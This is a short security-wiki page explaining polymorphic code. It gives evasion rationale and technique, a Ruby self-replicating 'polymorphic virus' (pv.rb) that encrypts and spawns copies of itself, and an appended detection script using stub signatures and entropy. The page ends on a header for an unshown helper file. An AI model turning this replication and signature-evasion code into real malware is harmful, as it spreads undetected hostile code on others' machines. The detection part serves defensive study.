Polymorphic
From NetSec
Revision by Gonzalo58T (Talk | contribs)
Revision as of 22:25, 9 November 2011
This article contains too little information; it should be expanded or updated.
Adj. referring to self-modifying code.
Reasons to write polymorphic code
The main reason to write polymorphic code is to avoid identification by file hash or by code signature: an IDS or anti-virus product will not recognize the payload because it is wrapped in an encrypted form. Another reason is to propagate it as multiple copies that do not share a signature. The decryption stub that unwraps the payload is itself not encrypted, so it remains a stable signature target, which is why anti-virus engines also emulate or sandbox code to see the decrypted payload.
Techniques of polymorphic code writing
- Define a stackable set of encrypting/decrypting functions, preferably keyed. Call these sets d and e (decryption / encryption), and let there be two integers n, m with n > m such that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code, i.e. the stacked decryptions undo the stacked encryptions.
Note: you can write a single function, or a single pair of functions, and vary them with a series of keys (ideally produced by a deterministic key generator), as long as the encryption remains reversible.
- Write the payload code (the code you want hidden). At the end of it, put a bootstrap that decrypts and runs the code (in PHP/Ruby/Perl and the like, eval it; in C, smash the stack with it; in C#, use reflection). At the beginning of the payload code, invoke the encryption/duplication code.
Example in Ruby
pv.rb (polymorphic virus)
<pre>
#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
  FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
  code = ""
  newkey = deterministicKeygen(key);
  File.open(FILE, "r").each_line do |l|
    code += l
  end
  code = mencrypt(code, key)
  # define new file name
  fn = rand(128).to_s + 'copy.rb';
  File.open(fn, 'w+') do |f|
    f.write('load "md.rb";'+"\n");
    # this is needed because __FILE__ isn't to be found in eval
    f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
    f.write('code="'+code+'";'+"\n")
    f.write('eval(mdecrypt(code, ' + key.to_s+'))');
  end
  return newkey
end

# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"
</pre>
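The detection side of the two points above (hash evasion, and the bootstrap that every copy carries), as an added example that is not part of the original page: it builds two constructed copies shaped like what the pv.rb bootstrap writes, with made-up blobs, shows that their SHA-256 hashes differ, and still flags both on the verbatim decryptor stub plus the entropy of the `code` literal. COPY_A, COPY_B, CLEAN, the signature names and the 4.0 entropy threshold are assumptions made here.

```ruby
require 'digest'
# Constructed sample: two copies shaped like what the pv.rb bootstrap writes (made-up blobs).
COPY_A = <<~RUBY
  load "md.rb";
  if (!defined?(FILE))
    FILE=__FILE__;
  end;
  code="Kx9Qe2mZ7vLp0Rt4Ws1Yb8NcDh3FgJ6a";
  eval(mdecrypt(code, 42))
RUBY
COPY_B = COPY_A.sub(/^code="[^"]*";/, 'code="Ty2Uw5Vx8Ya1Zb4Cd7Ef0Gh3Ij6Kl9Mn";')
# Constructed benign file that merely assigns a low-entropy string to `code`.
CLEAN = "code=\"aaaaaaaaaaaaaaaaaaaaaaaa\";\nputs code\n"
# The stub is written verbatim into every copy, so it is the stable signature target.
STUB_SIGNATURES = {
  loads_helper: /^load\s+"md\.rb";/,
  eval_decrypt: /eval\(mdecrypt\(code,\s*\d+\)\)/,
  blob_literal: /^code="[^"]{16,}";/
}.freeze

def sha256_hex(text)
  Digest::SHA256.hexdigest(text)
end

# Names of the stub signatures that fire on this text, in definition order.
def stub_matches(text)
  STUB_SIGNATURES.select { |_, re| text.match?(re) }.keys
end

# Shannon entropy (bits/char) of the literal assigned to `code`, nil when absent.
def blob_entropy(text)
  m = text.match(/^code="([^"]*)";/)
  return nil unless m
  blob = m[1]
  return 0.0 if blob.empty?
  counts = blob.each_char.each_with_object(Hash.new(0)) { |ch, h| h[ch] += 1 }
  counts.values.sum do |c|
    p = c.to_f / blob.length
    -p * Math.log2(p)
  end
end

# Hash alone cannot link two copies; the stub plus a high-entropy blob can.
def classify(text, min_entropy: 4.0)
  hits = stub_matches(text)
  ent = blob_entropy(text)
  verdict = (hits.size >= 2 || (ent && ent >= min_entropy)) ? :suspicious : :clean
  { sha256: sha256_hex(text), stub_hits: hits, blob_entropy: ent, verdict: verdict }
end
```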
md.rb (utility functions)